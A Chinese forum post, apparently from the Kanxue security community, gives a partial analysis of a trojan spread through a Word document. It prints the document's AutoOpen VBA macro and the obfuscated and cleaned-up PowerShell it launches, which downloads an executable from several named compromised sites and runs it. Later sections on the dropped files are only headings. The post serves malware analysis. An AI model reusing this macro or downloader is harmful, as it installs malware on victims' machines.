记一次某PE木马较不完整分析
本文为看雪论坛优秀文章
看雪论坛作者ID:阿伪
>>>> 1. 打开doc.宏代码
1. 打开doc.宏代码
Function XXX()
;这种格式表示一个函数
End Function
Sub AutoOpen()
;运行文档时候,自动运行宏
End Sub
autopen()
Hsbahypqju()
Function Hsbahypqju()
On Error Resume Next
Set Dtzjcfqgj = CreateObject("winmgmts:win32_processstartup")
Dtzjcfqgj.ShowWindow = 0#
Thbjfvedxuqm = "powershell -e <# https://www.microsoft.com/ #> $Eywrqrdqbmw='Rzhvtqwrc';$Jcwhciloutn = '846';$Ctyrqdpzavru='Wixhqavur';$Bpaqqzwo=$env:userprofile+'\'+$Jcwhciloutn+'.exe';$Yawfxccmy='Ezlignhvinnmt';$Tlvpwcruuo=.('new-'+'obj'+'ect') NEt.WebClIENT;$Jznyrpyuqf='http://complaintboardonline.com/wp-admin/qekr3925/*https://frazischool.com/wp-includes/ozi2y6740/*https://sagarngofoundation.com/jxc5c/q54824/*https://naturerepublickh.com/test/wvvqa9/*https://watonlight.com/wp-admin/wa31628/'."sp`LiT"('*');$Ufiwicmkrdst='Ohjtzdywhuim';foreach($Lygaeckfk in $Jznyrpyuqf){try{$Tlvpwcruuo."d`OwNLoa`D`FILE"($Lygaeckfk, $Bpaqqzwo);$Tlncrdhw='Fvsotfnt';If ((&('G'+'et-It'+'em') $Bpaqqzwo)."LE`NgtH" -ge 23622) {[Diagnostics.Process]::"s`TARt"($Bpaqqzwo);$Getujvyyonwg='Gppbzmrdhoel';break;$Cgphukmh='Hhiypojok'}}catch{}}$Pyreoccwfqy='Whyolyeyvhts'"
Set Ywlbxgbmzrxh = CreateObject("winmgmts:Win32_Process")
Finrmepurj = Ywlbxgbmzrxh.Create(Thbjfvedxuqm, Ncrmxklxbct, Dtzjcfqgj, Pxajxegluaugg)
End Function
Abiufkgnjgdiv(Kmtifafrucqb)
>>>> 2. PowerShell
2. PowerShell
$Eywrqrdqbmw='Rzhvtqwrc';
$Jcwhciloutn = '846';
$Ctyrqdpzavru='Wixhqavur';
$Bpaqqzwo="%userprofile%\846.exe";
$Yawfxccmy='Ezlignhvinnmt';
$Tlvpwcruuo=.('new-object') NEt.WebClIENT;
$Jznyrpyuqf='http://complaintboardonline.com/wp-admin/qekr3925/*https://frazischool.com/wp-includes/ozi2y6740/*https://sagarngofoundation.com/jxc5c/q54824/*https://naturerepublickh.com/test/wvvqa9/*https://watonlight.com/wp-admin/wa31628/'."spLiT"('*');
$Ufiwicmkrdst='Ohjtzdywhuim';
foreach($Lygaeckfk in $Jznyrpyuqf){
try{$Tlvpwcruuo."dOwNLoaDFILE"($Lygaeckfk, $Bpaqqzwo);
$Tlncrdhw='Fvsotfnt';
If ((&('Get-Item') $Bpaqqzwo)."LENgtH" -ge 23622) {
[Diagnostics.Process]::"sTARt"($Bpaqqzwo);
$Getujvyyonwg='Gppbzmrdhoel';
break;
$Cgphukmh='Hhiypojok'}
}
catch{}
}
$Pyreoccwfqy='Whyolyeyvhts'
>>>> 3. 846.exe
3. 846.exe
(1)行为分析
(2)详细分析
信息收集
流程分析
Winmain
导出函数 qzLgKZBqfCXorfLMeJzdKzgyvdzqwF()
解密数据执行
内存pe执行
主要功能
" class="anchor" href="#">
>>>> 4. dasmrcdasmrc.exe
4. dasmrcdasmrc.exe
IP
学习链接与资源
看雪ID:阿伪
https://bbs.pediy.com/user-779000.htm
推荐文章++++